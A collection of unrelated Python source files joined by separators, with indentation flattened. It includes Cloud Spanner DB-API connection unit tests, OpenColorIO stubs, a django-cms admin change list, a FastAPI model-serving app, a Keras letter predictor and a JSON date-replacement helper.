db_session: sqlalchemy.orm.Session,
owner: str = None,
format_: mlrun.api.schemas.ProjectsFormat = mlrun.api.schemas.ProjectsFormat.full,
labels: typing.List[str] = None,
state: mlrun.api.schemas.ProjectState = None,
projects_role: typing.Optional[mlrun.api.schemas.ProjectsRole] = None,
leader_session: typing.Optional[str] = None,
names: typing.Optional[typing.List[str]] = None,
) -> mlrun.api.schemas.ProjectsOutput:
pass
@abc.abstractmethod
def get_project_owner(
self, db_session: sqlalchemy.orm.Session, name: str,
) -> mlrun.api.schemas.ProjectOwner:
pass
|
import os
import sys
sys.path.insert(0, os.path.abspath('../..'))
from algolib.disjoint_set import DisjointSet
|
# Copyright 2020 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cloud Spanner DB-API Connection class unit tests."""
import mock
import unittest
import warnings
def _make_credentials():
from google.auth import credentials
class _CredentialsWithScopes(credentials.Credentials, credentials.Scoped):
pass
return mock.Mock(spec=_CredentialsWithScopes)
class TestConnection(unittest.TestCase):
PROJECT = "test-project"
INSTANCE = "test-instance"
DATABASE = "test-database"
USER_AGENT = "user-agent"
CREDENTIALS = _make_credentials()
def _get_client_info(self):
from google.api_core.gapic_v1.client_info import ClientInfo
return ClientInfo(user_agent=self.USER_AGENT)
def _make_connection(self):
from google.cloud.spanner_dbapi import Connection
from google.cloud.spanner_v1.instance import Instance
# We don't need a real Client object to test the constructor
instance = Instance(self.INSTANCE, client=None)
database = instance.database(self.DATABASE)
return Connection(instance, database)
def test_autocommit_setter_transaction_not_started(self):
connection = self._make_connection()
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.commit"
) as mock_commit:
connection.autocommit = True
mock_commit.assert_not_called()
self.assertTrue(connection._autocommit)
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.commit"
) as mock_commit:
connection.autocommit = False
mock_commit.assert_not_called()
self.assertFalse(connection._autocommit)
def test_autocommit_setter_transaction_started(self):
connection = self._make_connection()
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.commit"
) as mock_commit:
connection._transaction = mock.Mock(committed=False, rolled_back=False)
connection.autocommit = True
mock_commit.assert_called_once()
self.assertTrue(connection._autocommit)
def test_autocommit_setter_transaction_started_commited_rolled_back(self):
connection = self._make_connection()
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.commit"
) as mock_commit:
connection._transaction = mock.Mock(committed=True, rolled_back=False)
connection.autocommit = True
mock_commit.assert_not_called()
self.assertTrue(connection._autocommit)
connection.autocommit = False
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.commit"
) as mock_commit:
connection._transaction = mock.Mock(committed=False, rolled_back=True)
connection.autocommit = True
mock_commit.assert_not_called()
self.assertTrue(connection._autocommit)
def test_property_database(self):
from google.cloud.spanner_v1.database import Database
connection = self._make_connection()
self.assertIsInstance(connection.database, Database)
self.assertEqual(connection.database, connection._database)
def test_property_instance(self):
from google.cloud.spanner_v1.instance import Instance
connection = self._make_connection()
self.assertIsInstance(connection.instance, Instance)
self.assertEqual(connection.instance, connection._instance)
def test__session_checkout(self):
from google.cloud.spanner_dbapi import Connection
with mock.patch("google.cloud.spanner_v1.database.Database") as mock_database:
mock_database._pool = mock.MagicMock()
mock_database._pool.get = mock.MagicMock(return_value="db_session_pool")
connection = Connection(self.INSTANCE, mock_database)
connection._session_checkout()
mock_database._pool.get.assert_called_once_with()
self.assertEqual(connection._session, "db_session_pool")
connection._session = "db_session"
connection._session_checkout()
self.assertEqual(connection._session, "db_session")
def test__release_session(self):
from google.cloud.spanner_dbapi import Connection
with mock.patch("google.cloud.spanner_v1.database.Database") as mock_database:
mock_database._pool = mock.MagicMock()
mock_database._pool.put = mock.MagicMock()
connection = Connection(self.INSTANCE, mock_database)
connection._session = "session"
connection._release_session()
mock_database._pool.put.assert_called_once_with("session")
self.assertIsNone(connection._session)
def test_transaction_checkout(self):
from google.cloud.spanner_dbapi import Connection
connection = Connection(self.INSTANCE, self.DATABASE)
connection._session_checkout = mock_checkout = mock.MagicMock(autospec=True)
connection.transaction_checkout()
mock_checkout.assert_called_once_with()
connection._transaction = mock_transaction = mock.MagicMock()
mock_transaction.committed = mock_transaction.rolled_back = False
self.assertEqual(connection.transaction_checkout(), mock_transaction)
connection._autocommit = True
self.assertIsNone(connection.transaction_checkout())
def test_close(self):
from google.cloud.spanner_dbapi import connect, InterfaceError
with mock.patch(
"google.cloud.spanner_v1.instance.Instance.exists", return_value=True
):
with mock.patch(
"google.cloud.spanner_v1.database.Database.exists", return_value=True
):
connection = connect("test-instance", "test-database")
self.assertFalse(connection.is_closed)
connection.close()
self.assertTrue(connection.is_closed)
with self.assertRaises(InterfaceError):
connection.cursor()
connection._transaction = mock_transaction = mock.MagicMock()
mock_transaction.committed = mock_transaction.rolled_back = False
mock_transaction.rollback = mock_rollback = mock.MagicMock()
connection.close()
mock_rollback.assert_called_once_with()
@mock.patch.object(warnings, "warn")
def test_commit(self, mock_warn):
from google.cloud.spanner_dbapi import Connection
from google.cloud.spanner_dbapi.connection import AUTOCOMMIT_MODE_WARNING
connection = Connection(self.INSTANCE, self.DATABASE)
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection._release_session"
) as mock_release:
connection.commit()
mock_release.assert_not_called()
connection._transaction = mock_transaction = mock.MagicMock(
rolled_back=False, committed=False
)
mock_transaction.commit = mock_commit = mock.MagicMock()
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection._release_session"
) as mock_release:
connection.commit()
mock_commit.assert_called_once_with()
mock_release.assert_called_once_with()
connection._autocommit = True
connection.commit()
mock_warn.assert_called_once_with(
AUTOCOMMIT_MODE_WARNING, UserWarning, stacklevel=2
)
@mock.patch.object(warnings, "warn")
def test_rollback(self, mock_warn):
from google.cloud.spanner_dbapi import Connection
from google.cloud.spanner_dbapi.connection import AUTOCOMMIT_MODE_WARNING
connection = Connection(self.INSTANCE, self.DATABASE)
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection._release_session"
) as mock_release:
connection.rollback()
mock_release.assert_not_called()
connection._transaction = mock_transaction = mock.MagicMock()
mock_transaction.rollback = mock_rollback = mock.MagicMock()
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection._release_session"
) as mock_release:
connection.rollback()
mock_rollback.assert_called_once_with()
mock_release.assert_called_once_with()
connection._autocommit = True
connection.rollback()
mock_warn.assert_called_once_with(
AUTOCOMMIT_MODE_WARNING, UserWarning, stacklevel=2
)
def test_run_prior_DDL_statements(self):
from google.cloud.spanner_dbapi import Connection, InterfaceError
with mock.patch(
"google.cloud.spanner_v1.database.Database", autospec=True
) as mock_database:
connection = Connection(self.INSTANCE, mock_database)
connection.run_prior_DDL_statements()
mock_database.update_ddl.assert_not_called()
ddl = ["ddl"]
connection._ddl_statements = ddl
connection.run_prior_DDL_statements()
mock_database.update_ddl.assert_called_once_with(ddl)
connection.is_closed = True
with self.assertRaises(InterfaceError):
connection.run_prior_DDL_statements()
def test_context(self):
connection = self._make_connection()
with connection as conn:
self.assertEqual(conn, connection)
self.assertTrue(connection.is_closed)
def test_connect(self):
from google.cloud.spanner_dbapi import Connection, connect
with mock.patch("google.cloud.spanner_v1.Client"):
with mock.patch(
"google.api_core.gapic_v1.client_info.ClientInfo",
return_value=self._get_client_info(),
):
connection = connect(
self.INSTANCE,
self.DATABASE,
self.PROJECT,
self.CREDENTIALS,
self.USER_AGENT,
)
self.assertIsInstance(connection, Connection)
def test_connect_instance_not_found(self):
from google.cloud.spanner_dbapi import connect
with mock.patch(
"google.cloud.spanner_v1.instance.Instance.exists", return_value=False
):
with self.assertRaises(ValueError):
connect("test-instance", "test-database")
def test_connect_database_not_found(self):
from google.cloud.spanner_dbapi import connect
with mock.patch(
"google.cloud.spanner_v1.database.Database.exists", return_value=False
):
with mock.patch(
"google.cloud.spanner_v1.instance.Instance.exists", return_value=True
):
with self.assertRaises(ValueError):
connect("test-instance", "test-database")
def test_default_sessions_pool(self):
from google.cloud.spanner_dbapi import connect
with mock.patch("google.cloud.spanner_v1.instance.Instance.database"):
with mock.patch(
"google.cloud.spanner_v1.instance.Instance.exists", return_value=True
):
connection = connect("test-instance", "test-database")
self.assertIsNotNone(connection.database._pool)
def test_sessions_pool(self):
from google.cloud.spanner_dbapi import connect
from google.cloud.spanner_v1.pool import FixedSizePool
database_id = "test-database"
pool = FixedSizePool()
with mock.patch(
"google.cloud.spanner_v1.instance.Instance.database"
) as database_mock:
with mock.patch(
"google.cloud.spanner_v1.instance.Instance.exists", return_value=True
):
connect("test-instance", database_id, pool=pool)
database_mock.assert_called_once_with(database_id, pool=pool)
def test_run_statement_remember_statements(self):
"""Check that Connection remembers executed statements."""
from google.cloud.spanner_dbapi.checksum import ResultsChecksum
from google.cloud.spanner_dbapi.cursor import Statement
sql = """SELECT 23 FROM table WHERE id = @a1"""
params = {"a1": "value"}
param_types = {"a1": str}
connection = self._make_connection()
statement = Statement(sql, params, param_types, ResultsChecksum(), False)
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.transaction_checkout"
):
connection.run_statement(statement)
self.assertEqual(connection._statements[0].sql, sql)
self.assertEqual(connection._statements[0].params, params)
self.assertEqual(connection._statements[0].param_types, param_types)
self.assertIsInstance(connection._statements[0].checksum, ResultsChecksum)
def test_run_statement_dont_remember_retried_statements(self):
"""Check that Connection doesn't remember re-executed statements."""
from google.cloud.spanner_dbapi.checksum import ResultsChecksum
from google.cloud.spanner_dbapi.cursor import Statement
sql = """SELECT 23 FROM table WHERE id = @a1"""
params = {"a1": "value"}
param_types = {"a1": str}
connection = self._make_connection()
statement = Statement(sql, params, param_types, ResultsChecksum(), False)
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.transaction_checkout"
):
connection.run_statement(statement, retried=True)
self.assertEqual(len(connection._statements), 0)
def test_run_statement_w_homogeneous_insert_statements(self):
"""Check that Connection executed homogeneous insert statements."""
from google.cloud.spanner_dbapi.checksum import ResultsChecksum
from google.cloud.spanner_dbapi.cursor import Statement
sql = "INSERT INTO T (f1, f2) VALUES (%s, %s), (%s, %s)"
params = ["a", "b", "c", "d"]
param_types = {"f1": str, "f2": str}
connection = self._make_connection()
statement = Statement(sql, params, param_types, ResultsChecksum(), True)
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.transaction_checkout"
):
connection.run_statement(statement, retried=True)
self.assertEqual(len(connection._statements), 0)
def test_clear_statements_on_commit(self):
"""
        Check that all the saved statements are
        cleared when the transaction is committed.
"""
connection = self._make_connection()
connection._transaction = mock.Mock(rolled_back=False, committed=False)
connection._statements = [{}, {}]
self.assertEqual(len(connection._statements), 2)
with mock.patch("google.cloud.spanner_v1.transaction.Transaction.commit"):
connection.commit()
self.assertEqual(len(connection._statements), 0)
def test_clear_statements_on_rollback(self):
"""
        Check that all the saved statements are
        cleared when the transaction is rolled back.
"""
connection = self._make_connection()
connection._transaction = mock.Mock()
connection._statements = [{}, {}]
self.assertEqual(len(connection._statements), 2)
with mock.patch("google.cloud.spanner_v1.transaction.Transaction.commit"):
connection.rollback()
self.assertEqual(len(connection._statements), 0)
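    # The tests below exercise the retry mechanism: on an Aborted error the
    # connection re-runs the remembered statements and compares the result
    # checksums against the original run, raising RetryAborted on a mismatch.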
def test_retry_transaction(self):
"""Check retrying an aborted transaction."""
from google.cloud.spanner_dbapi.checksum import ResultsChecksum
from google.cloud.spanner_dbapi.cursor import Statement
row = ["field1", "field2"]
connection = self._make_connection()
checksum = ResultsChecksum()
checksum.consume_result(row)
        retried_checksum = ResultsChecksum()
statement = Statement("SELECT 1", [], {}, checksum, False)
connection._statements.append(statement)
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.run_statement",
            return_value=([row], retried_checksum),
) as run_mock:
with mock.patch(
"google.cloud.spanner_dbapi.connection._compare_checksums"
) as compare_mock:
connection.retry_transaction()
                compare_mock.assert_called_with(checksum, retried_checksum)
run_mock.assert_called_with(statement, retried=True)
def test_retry_transaction_checksum_mismatch(self):
"""
        Check retrying an aborted transaction
        when the results checksums mismatch.
"""
from google.cloud.spanner_dbapi.exceptions import RetryAborted
from google.cloud.spanner_dbapi.checksum import ResultsChecksum
from google.cloud.spanner_dbapi.cursor import Statement
row = ["field1", "field2"]
retried_row = ["field3", "field4"]
connection = self._make_connection()
checksum = ResultsChecksum()
checksum.consume_result(row)
        retried_checksum = ResultsChecksum()
statement = Statement("SELECT 1", [], {}, checksum, False)
connection._statements.append(statement)
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.run_statement",
            return_value=([retried_row], retried_checksum),
):
with self.assertRaises(RetryAborted):
connection.retry_transaction()
def test_commit_retry_aborted_statements(self):
"""Check that retried transaction executing the same statements."""
from google.api_core.exceptions import Aborted
from google.cloud.spanner_dbapi.checksum import ResultsChecksum
from google.cloud.spanner_dbapi.connection import connect
from google.cloud.spanner_dbapi.cursor import Statement
row = ["field1", "field2"]
with mock.patch(
"google.cloud.spanner_v1.instance.Instance.exists", return_value=True,
):
with mock.patch(
"google.cloud.spanner_v1.database.Database.exists", return_value=True,
):
connection = connect("test-instance", "test-database")
cursor = connection.cursor()
cursor._checksum = ResultsChecksum()
cursor._checksum.consume_result(row)
statement = Statement("SELECT 1", [], {}, cursor._checksum, False)
connection._statements.append(statement)
connection._transaction = mock.Mock(rolled_back=False, committed=False)
with mock.patch.object(
connection._transaction, "commit", side_effect=(Aborted("Aborted"), None),
):
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.run_statement",
return_value=([row], ResultsChecksum()),
) as run_mock:
connection.commit()
run_mock.assert_called_with(statement, retried=True)
def test_retry_transaction_drop_transaction(self):
"""
        Check that before retrying an aborted transaction
        the connection drops the original aborted transaction.
"""
connection = self._make_connection()
transaction_mock = mock.Mock()
connection._transaction = transaction_mock
# as we didn't set any statements, the method
# will only drop the transaction object
connection.retry_transaction()
self.assertIsNone(connection._transaction)
def test_retry_aborted_retry(self):
"""
        Check that if a retried transaction fails,
        the connection will retry it once again.
"""
from google.api_core.exceptions import Aborted
from google.cloud.spanner_dbapi.checksum import ResultsChecksum
from google.cloud.spanner_dbapi.connection import connect
from google.cloud.spanner_dbapi.cursor import Statement
row = ["field1", "field2"]
with mock.patch(
"google.cloud.spanner_v1.instance.Instance.exists", return_value=True,
):
with mock.patch(
"google.cloud.spanner_v1.database.Database.exists", return_value=True,
):
connection = connect("test-instance", "test-database")
cursor = connection.cursor()
cursor._checksum = ResultsChecksum()
cursor._checksum.consume_result(row)
statement = Statement("SELECT 1", [], {}, cursor._checksum, False)
connection._statements.append(statement)
metadata_mock = mock.Mock()
metadata_mock.trailing_metadata.return_value = {}
with mock.patch.object(
connection,
"run_statement",
side_effect=(
Aborted("Aborted", errors=[metadata_mock]),
([row], ResultsChecksum()),
),
) as retry_mock:
connection.retry_transaction()
retry_mock.assert_has_calls(
(
mock.call(statement, retried=True),
mock.call(statement, retried=True),
)
)
|
# SPDX-License-Identifier: BSD-3-Clause
# Copyright Contributors to the OpenColorIO Project.
class ColorSpace:
"""
A color space is the state of an image in terms of colorimetry and color
encoding. I.e., it defines how an image's color information needs to be
interpreted.
Transforming images between different color spaces is the primary
motivation for the OCIO library.
While a complete discussion of color spaces is beyond the scope of this
documentation, traditional uses would be to have color spaces describing
image capture devices, such as cameras and scanners, and internal
'convenience' spaces, such as scene-linear and logarithmic.
Color spaces are specific to a particular image precision
(float32, uint8, etc.). The set of color spaces that provide equivalent
    mappings (at different precisions) is referred to as a 'family'.
.. code-block:: python
import PyOpenColorIO as OCIO
config = OCIO.Config()
"""
def __init__(self):
pass
def isEditable(self):
pass
def createEditableCopy(self):
pass
def getName(self):
pass
def setName(self, name):
pass
def getFamily(self):
pass
def setFamily(self, family):
pass
def getEqualityGroup(self):
pass
def setEqualityGroup(self, equalityGroup):
pass
def getDescription(self):
pass
def setDescription(self, desc):
pass
def getBitDepth(self):
pass
def setBitDepth(self, bitDepth):
pass
def isData(self):
"""
        ColorSpaces that are data are treated a bit specially. Basically, any
colorspace transforms you try to apply to them are ignored. (Think
of applying a gamut mapping transform to an ID pass). Also, the
:py:class:`PyOpenColorIO.DisplayTransform` process obeys special
'data min' and 'data max' args.
        This is traditionally used for pixel data that represents non-color
        information, such as normals, point positions, ID information, etc.
"""
pass
def setIsData(self, isData):
pass
def getAllocation(self):
"""
If this colorspace needs to be transferred to a limited dynamic
range coding space (such as during display with a GPU path), use this
allocation to maximize bit efficiency.
"""
pass
def setAllocation(self, allocation):
pass
def getAllocationVars(self):
pass
def setAllocationVars(self, vars):
pass
def getTransform(self):
pass
def setTransform(self, transform, direction):
pass
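# Illustrative sketch (not part of the original module): how a ColorSpace is
# typically created and registered with a Config, using the setters stubbed
# above. The addColorSpace() call and the specific names/values below are
# assumptions based on the PyOpenColorIO API and may differ between versions.
def _example_build_colorspace():
    import PyOpenColorIO as OCIO
    config = OCIO.Config()
    cs = OCIO.ColorSpace()
    cs.setName('scene_linear')   # placeholder name
    cs.setFamily('ln')           # placeholder family
    cs.setDescription('Scene-linear working space (example only).')
    config.addColorSpace(cs)
    return config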
|
# -*- coding: utf-8 -*-
import bisect
from cms.models import Title, Page, EmptyTitle
from cms.utils import get_language_list
from cms.utils.compat import DJANGO_1_5
from cms.utils.conf import get_cms_setting
from cms.utils.permissions import get_user_sites_queryset
from django.contrib.admin.views.main import ChangeList, ALL_VAR, IS_POPUP_VAR, \
ORDER_TYPE_VAR, ORDER_VAR, SEARCH_VAR
from django.contrib.sites.models import Site
import django
COPY_VAR = "copy"
def cache_tree_children(queryset):
"""
For all items in the queryset, set the '_cached_children' attribute to a
list. This attribute is in turn used by the 'get_children' method on the
item, which would otherwise (if '_cached_children' is not set) cause a
database query.
The queryset must be ordered by 'lft', or the function will put the children
in the wrong order.
"""
parents_dict = {}
# Loop through the queryset twice, so that the function works even if the
# mptt tree is broken. Since django caches querysets internally, the extra
# computation time is minimal.
for obj in queryset:
parents_dict[obj.pk] = obj
obj._cached_children = []
for obj in queryset:
parent = parents_dict.get(obj.parent_id)
if parent:
parent._cached_children.append(obj)
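# Illustrative sketch (not part of the original module): cache_tree_children()
# expects a queryset ordered by 'lft'; afterwards page.get_children() can be
# served from the pre-built '_cached_children' lists without extra queries.
# The manager call and ordering below mirror the usage later in this file but
# are shown here only as an example.
def _example_cache_tree_children():
    pages = Page.objects.drafts().order_by('tree_id', 'lft')
    cache_tree_children(pages)
    for page in pages:
        # reads the cached children instead of hitting the database again
        print(page.pk, [child.pk for child in page.get_children()])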
class CMSChangeList(ChangeList):
"""
Renders a Changelist - In our case it looks like a tree - it's the list of
*instances* in the Admin.
It is usually responsible for pagination (not here though, we have a
treeview)
"""
real_queryset = False
def __init__(self, request, *args, **kwargs):
from cms.utils.plugins import current_site
self._current_site = current_site(request)
super(CMSChangeList, self).__init__(request, *args, **kwargs)
        self.queryset = self.get_query_set(request)
self.get_results(request)
if self._current_site:
request.session['cms_admin_site'] = self._current_site.pk
self.set_sites(request)
def get_query_set(self, request=None):
if COPY_VAR in self.params:
del self.params[COPY_VAR]
if 'language' in self.params:
del self.params['language']
if 'page_id' in self.params:
del self.params['page_id']
if django.VERSION[1] > 3:
qs = super(CMSChangeList, self).get_query_set(request).drafts()
else:
qs = super(CMSChangeList, self).get_query_set().drafts()
if request:
site = self.current_site()
permissions = Page.permissions.get_change_id_list(request.user, site)
if permissions != Page.permissions.GRANT_ALL:
qs = qs.filter(pk__in=permissions)
# root_query_set is a read-only property in Django 1.6
# and will be removed in Django 1.8.
queryset_attr = 'root_query_set' if DJANGO_1_5 else 'root_queryset'
setattr(self, queryset_attr, self.root_query_set.filter(pk__in=permissions))
self.real_queryset = True
qs = qs.filter(site=self._current_site)
return qs
def is_filtered(self):
from cms.utils.plugins import SITE_VAR
lookup_params = self.params.copy() # a dictionary of the query string
for i in (ALL_VAR, ORDER_VAR, ORDER_TYPE_VAR, SEARCH_VAR, IS_POPUP_VAR, SITE_VAR, 'language', 'page_id'):
if i in lookup_params:
del lookup_params[i]
if not lookup_params.items() and not self.query:
return False
return True
def get_results(self, request):
if self.real_queryset:
super(CMSChangeList, self).get_results(request)
if not self.is_filtered():
self.full_result_count = self.result_count = self.root_query_set.count()
else:
self.full_result_count = self.root_query_set.count()
def set_items(self, request):
site = self.current_site()
# Get all the pages, ordered by tree ID (it's convenient to build the
# tree using a stack now)
pages = self.get_query_set(request).drafts().order_by('tree_id', 'lft').select_related('publisher_public')
# Get lists of page IDs for which the current user has
# "permission to..." on the current site.
if get_cms_setting('PERMISSION'):
perm_edit_ids = Page.permissions.get_change_id_list(request.user, site)
perm_publish_ids = Page.permissions.get_publish_id_list(request.user, site)
perm_advanced_settings_ids = Page.permissions.get_advanced_settings_id_list(request.user, site)
restricted_ids = Page.permissions.get_restricted_id_list(site)
if perm_edit_ids and perm_edit_ids != Page.permissions.GRANT_ALL:
pages = pages.filter(pk__in=perm_edit_ids)
root_pages = []
pages = list(pages)
all_pages = pages[:] # That is, basically, a copy.
# Unfortunately we cannot use the MPTT builtin code for pre-caching
# the children here, because MPTT expects the tree to be 'complete'
        # and otherwise complains about 'invalid item order'
cache_tree_children(pages)
ids = dict((page.id, page) for page in pages)
for page in pages:
children = list(page.get_children())
# If the parent page is not among the nodes shown, this node should
# be a "root node". The filtering for this has already been made, so
# using the ids dictionary means this check is constant time
page.root_node = page.parent_id not in ids
if get_cms_setting('PERMISSION'):
# caching the permissions
page.permission_edit_cache = perm_edit_ids == Page.permissions.GRANT_ALL or page.pk in perm_edit_ids
page.permission_publish_cache = perm_publish_ids == Page.permissions.GRANT_ALL or page.pk in perm_publish_ids
page.permission_advanced_settings_cache = perm_advanced_settings_ids == Page.permissions.GRANT_ALL or page.pk in perm_advanced_settings_ids
page.permission_user_cache = request.user
page.permission_restricted = page.pk in restricted_ids
if page.root_node or self.is_filtered():
page.last = True
if len(children):
                    # TODO: review this logic -- the last child is deliberately
                    # marked as not-last here. children should NOT be a queryset;
                    # if it is, check that your django-mptt version is 0.5.1
children[-1].last = False
page.menu_level = 0
root_pages.append(page)
if page.parent_id:
page.get_cached_ancestors(ascending=True)
else:
page.ancestors_ascending = []
            # Because 'children' is the reverse-FK accessor for the 'parent'
            # FK from Page->Page, that name is already taken, so we have to use
            # the (intentionally) wrong plural and set an attribute called
            # 'childrens' instead.
# If the queryset is filtered, do NOT set the 'childrens' attribute
# since *ALL* pages will be in the 'root_pages' list and therefore
# be displayed. (If the queryset is filtered, the result is not a
# tree but rather a flat list).
if self.is_filtered():
page.childrens = []
else:
page.childrens = children
for page in all_pages:
page.title_cache = {}
page.all_languages = []
if page.publisher_public_id:
page.publisher_public.title_cache = {}
page.publisher_public.all_languages = []
ids[page.publisher_public_id] = page.publisher_public
titles = Title.objects.filter(page__in=ids)
insort = bisect.insort # local copy to avoid globals lookup in the loop
for title in titles:
page = ids[title.page_id]
page.title_cache[title.language] = title
            if title.language not in page.all_languages:
insort(page.all_languages, title.language)
site_id = self.current_site()
languages = get_language_list(site_id)
for page in all_pages:
for lang in languages:
                if lang not in page.title_cache:
page.title_cache[lang] = EmptyTitle(lang)
self.root_pages = root_pages
def get_items(self):
return self.root_pages
def set_sites(self, request):
"""Sets sites property to current instance - used in tree view for
sites combo.
"""
if get_cms_setting('PERMISSION'):
self.sites = get_user_sites_queryset(request.user)
else:
self.sites = Site.objects.all()
self.has_access_to_multiple_sites = len(self.sites) > 1
def current_site(self):
return self._current_site
|
from typing import Callable, List, Dict, Union
import atexit
from collections.abc import Sequence
from copy import deepcopy
import os
from PIL import Image
from fastapi import FastAPI, UploadFile, File, Request
from fastapi.templating import Jinja2Templates
from pydantic import BaseModel
from datetime import datetime
import numpy as np
import torch
import sys
from .logger import Logger
app = FastAPI(
title="torch-deploy",
description="one line deployment for pytorch models"
)
config = None
inference_fn = None
pre = []
post = []
logger = None
templates = Jinja2Templates(directory=os.path.join(os.path.dirname(__file__), "templates"))
@atexit.register
def cleanup():
if logger is not None:
logger.close()
class ModelInput(BaseModel):
'''Pydantic Model to receive parameters for the /predict endpoint'''
inputs: Union[List, Dict]
def setup(my_config):
'''Initialize the global variables'''
global inference_fn, pre, post, logger, config
config = deepcopy(my_config)
# Make log directory if it doesn't exist
my_logdir = config["logdir"]
if not os.path.isdir(my_logdir):
os.mkdir(my_logdir)
# Init logger
logger = Logger(os.path.join(my_logdir, "logfile"))
# Init inference_fn
model = config["model"]
if config["inference_fn"] is not None:
inference_fn = getattr(model, config["inference_fn"])
else:
inference_fn = model
# Init preprocessing and postprocessing functions
my_pre = config["pre"]
my_post = config["post"]
if my_pre:
if isinstance(my_pre, Sequence):
pre = list(my_pre)
else:
pre = [my_pre]
if my_post:
if isinstance(my_post, Sequence):
post = list(my_post)
else:
post = [my_post]
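# Illustrative sketch (not part of the original module): a minimal config dict
# for setup(), using only the keys read above ("model", "inference_fn", "pre",
# "post", "logdir"). The identity model, the lambda preprocessor and the logdir
# value are placeholders for demonstration only.
def _example_setup():
    example_config = {
        "model": torch.nn.Identity(),   # any callable / torch.nn.Module
        "inference_fn": None,           # or a method name such as "forward"
        "pre": [lambda x: torch.as_tensor(x, dtype=torch.float32)],
        "post": [],
        "logdir": "deploy_logs",
    }
    setup(example_config)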
def run_model(inp):
# Apply all preprocessing functions
for f in pre:
inp = f(inp)
# Pass input through model
output = inference_fn(inp)
# Apply all postprocessing functions
for f in post:
output = f(output)
# If torch tensor or numpy array, transform to list so we can pass it back
if isinstance(output, (np.ndarray, torch.Tensor)):
output = output.tolist()
return output
@app.get("/")
def root():
# For testing/debugging
return {"text": "Hello World!"}
@app.post("/predict")
def predict(model_input: ModelInput, request: Request):
'''
View function handling the main /predict endpoint
    Input: Expects an application/json body. The value of the "inputs" field
    is passed to the model as input and should be a list or a dict.
Output: The output of the model after being run through the postprocessing
functions.
'''
inp = model_input.inputs
# Logging
client_host = request.client.host
logger.log(f'[{datetime.now()}] Received input of size {sys.getsizeof(inp)} from {client_host}')
output = run_model(inp)
return {"output": output}
@app.get("/predict_image")
def upload_image(request: Request):
return templates.TemplateResponse("upload.html", {"request": request})
@app.post("/predict_image")
def predict_image(request: Request, file: UploadFile = File(...)):
'''
View function handling the /predict_image endpoint
    Input: Expects a multipart/form-data body with an uploaded image file.
    The image is opened with PIL and passed to the model.
Output: The output of the model after being run through the postprocessing
functions.
'''
inp = Image.open(file.file)
# Logging
client_host = request.client.host
logger.log(f'[{datetime.now()}] Received input of size {sys.getsizeof(inp)} from {client_host}')
output = run_model(inp)
return {"output": output}
|
# Unsure the majority of the time, but more correct than wrong when thinking of a letter
# Requires more data for training
from data import *
from tkinter import *
from keras.models import load_model
import numpy as np
import threading
import time
# Time variables
start_wait = 10000
wait = 2100
# Set dimensions
w = 900
h = 556
root = Tk()
root.geometry(str(w)+'x'+str(h))
root.title('Predictor')
graphing_area = Canvas(root, width=w, height=h)
graphing_area.pack()
# Import model to be used
saved_model = load_model('model.h5')
# Begin data thread
thread = threading.Thread(target=data_loop, args=[False, False, False, 1, False])
thread.start()
# Predicts the input values and returns predicted letter
def predict(values, model):
processed_data = np.expand_dims(np.array([np.abs(np.fft.rfft(np.array(values)))/85000]), 3)
prediction = model.predict(processed_data)
print(prediction[0][0])
if prediction[0][0] < 0.1:
return 'B'
elif prediction[0][0] > 0.9:
return 'A'
else:
return '?'
def display_prediction(canvas, frame, model):
prediction = predict(last_values[-1500:], model)
canvas.delete('all')
canvas.create_text(w / 2, h / 2, font="Arial " + str(int(round(h / 3, 0))), text='Collecting...', anchor='center')
time.sleep(1)
canvas.delete('all')
canvas.create_text(w / 2, h / 2, font="Arial " + str(int(round(h / 3, 0))), text=prediction, anchor='center')
root.after(wait, display_prediction, canvas, frame, model)
root.after(start_wait, display_prediction, graphing_area, root, saved_model)
root.mainloop()
|
import json
from Function.Symbol_ReplaceController import *
from Function.Position_strController import *
from Function.initdate_ReplaceController import *
from Function.Date_ReplaceController import *
from JsonReplace import JsonReplace
def get_new_json(file_path):
    # Open the JSON file
file = open(file_path, encoding='gbk')
json_to_python = json.load(file, strict=False)
    # Determine the JSON file format
    if 'data' in json_to_python:  # format where the file only contains a single "data" object
        return json_to_python
    elif "rows" not in json_to_python:  # the file is in list format
        # Handle values in the JSON file that are already "-"; setting the parameter to 1 enables this
if int(JsonReplace().symbol_para) == 1:
json_to_python = Symbol_ReplaceController(json_to_python, file_path)
        # Replace position_str values that contain the current date
json_to_python = Position_strController(json_to_python)
        # Process init_date in the JSON file
json_to_python = initdate_ReplaceController(json_to_python)
        # Process the specified date keys in the JSON file
for key in JsonReplace().date_key:
date_value = JsonReplace().config.get("DATE", key)
for value in date_value.split(','):
json_to_python = Date_ReplaceController(json_to_python, value)
return json_to_python
    else:  # the file is in dict format
        json_to_python_rows = json_to_python['rows']  # the culprit that caused fields to be lost when writing the JSON file back
        # Handle values in the JSON file that are already "-"; setting the parameter to 1 enables this
if int(JsonReplace().symbol_para) == 1:
json_to_python_rows = Symbol_ReplaceController(json_to_python_rows, file_path)
        # Replace position_str values that contain the current date
json_to_python_rows = Position_strController(json_to_python_rows)
        # Process init_date in the JSON file
json_to_python_rows = initdate_ReplaceController(json_to_python_rows)
        # Process the specified date keys in the JSON file
for key in JsonReplace().date_key:
date_value = JsonReplace().config.get("DATE", key)
for value in date_value.split(','):
json_to_python_rows = Date_ReplaceController(json_to_python_rows, value)
json_to_python['rows'] = json_to_python_rows
return json_to_python
